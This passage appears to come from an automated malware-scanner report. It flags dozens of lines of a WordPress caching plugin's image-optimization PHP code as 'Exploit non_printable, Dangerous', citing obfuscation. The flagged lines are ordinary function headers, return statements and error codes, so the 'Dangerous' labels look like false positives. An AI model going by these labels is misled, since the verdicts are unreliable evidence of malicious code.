<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hook</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 155</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_not_optimized_before</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 160</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$valueJson</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 167</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"metaOptimized" </span><span style="color: #007700">=> array(), </span><span style="color: #DD0000">"images" </span><span style="color: #007700">=> </span><span style="color: #0000BB">array_slice</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">images</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">), </span><span style="color: #DD0000">"total_reduction" </span><span style="color: #007700">=> </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #DD0000">"percentage" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$percentage</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"metaOptimized" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$metaOptimized</span><span style="color: #007700">, </span><span style="color: #DD0000">"images" </span><span style="color: #007700">=> </span><span style="color: #0000BB">array_slice</span><span style="color: #007700">(</span><span style="color: #0000BB">$tmp_image</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">), </span><span style="color: #DD0000">"total_reduction" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$total_reduction</span><span style="color: #007700">, </span><span style="color: #DD0000">"percentage" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$percentage</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"metaOptimized" </span><span style="color: #007700">=> array(), </span><span style="color: #DD0000">"images" </span><span style="color: #007700">=> array(), </span><span style="color: #DD0000">"total_reduction" </span><span style="color: #007700">=> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">object_to_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$obj</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 217</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$new</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">re_order_by_dimensions</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$tmp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_api_key</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">optimizeFirstImage</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">""</span><span style="color: #007700">, </span><span style="color: #DD0000">"unlock this"</span><span style="color: #007700">); </span><span style="color: #FF8000">//bugs</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 239</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"finish"</span><span style="color: #007700">, </span><span style="color: #DD0000">"success"</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"Image has been optimizedxx"</span><span style="color: #007700">, </span><span style="color: #DD0000">"success"</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">id</span><span style="color: #007700">, </span><span style="color: #0000BB">100</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 272</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"Please Create folder "</span><span style="color: #007700">.</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">uploadDir</span><span style="color: #007700">[</span><span style="color: #DD0000">"basedir"</span><span style="color: #007700">].</span><span style="color: #DD0000">"/wpfc-backup/"</span><span style="color: #007700">, </span><span style="color: #DD0000">"error"</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 291</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"Image has been optimizedxx"</span><span style="color: #007700">, </span><span style="color: #DD0000">"success"</span><span style="color: #007700">, </span><span style="color: #DD0000">""</span><span style="color: #007700">, </span><span style="color: #0000BB">100</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_template_path</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #0000BB">$res</span><span style="color: #007700">[</span><span style="color: #DD0000">"error_message"</span><span style="color: #007700">], </span><span style="color: #DD0000">"error"</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">WPFC_WP_PLUGIN_DIR</span><span style="color: #007700">.</span><span style="color: #DD0000">"/wp-fastest-cache-premium/pro/templates/"</span><span style="color: #007700">.</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"Image has been optimizedxx"</span><span style="color: #007700">, </span><span style="color: #DD0000">"success"</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">id</span><span style="color: #007700">, </span><span style="color: #0000BB">$percentage</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_total_reduction_image_number</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_meta</span><span style="color: #007700">(</span><span style="color: #0000BB">$total_reduction</span><span style="color: #007700">, </span><span style="color: #0000BB">$metaOptimized</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 348</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">100</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 377</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$percentage</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 381</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clean_backups</span><span style="color: #007700">(</span><span style="color: #0000BB">$meta</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 389</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">compress</span><span style="color: #007700">(</span><span style="color: #0000BB">$source_image</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$result</span><span style="color: #007700">-></span><span style="color: #0000BB">total </span><span style="color: #007700">&& </span><span style="color: #0000BB">$result</span><span style="color: #007700">-></span><span style="color: #0000BB">total </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$result</span><span style="color: #007700">-></span><span style="color: #0000BB">total </span><span style="color: #007700">: </span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 428</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">11</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 432</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">8</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">14</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 440</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">9</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">21</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$image_exist</span><span style="color: #007700">-></span><span style="color: #0000BB">get_error_message</span><span style="color: #007700">());</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">13</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_total_optimized_image_number</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 461</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">12</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">16</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">15</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 486</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$source_path</span><span style="color: #007700">.</span><span style="color: #DD0000">" is not writable"</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">4</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$destination_path</span><span style="color: #007700">.</span><span style="color: #DD0000">" is not writable"</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">5</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 503</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">7</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$compressed_result</span><span style="color: #007700">[</span><span style="color: #DD0000">"error_message"</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 522</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #DD0000">"destination_path" </span><span style="color: #007700">=> </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/\_tmp$/"</span><span style="color: #007700">, </span><span style="color: #DD0000">""</span><span style="color: #007700">, </span><span style="color: #0000BB">$destination_path</span><span style="color: #007700">), </span><span style="color: #DD0000">"reduction" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$diff</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 524</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">20</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$destination_path</span><span style="color: #007700">.</span><span style="color: #DD0000">" file size of destination_move_source_path is zero"</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 527</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">19</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #0000BB">$destination_path</span><span style="color: #007700">.</span><span style="color: #DD0000">" destination_move_source_path is not saved"</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 531</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">5</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 534</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_code" </span><span style="color: #007700">=> </span><span style="color: #0000BB">4</span><span style="color: #007700">);</span>
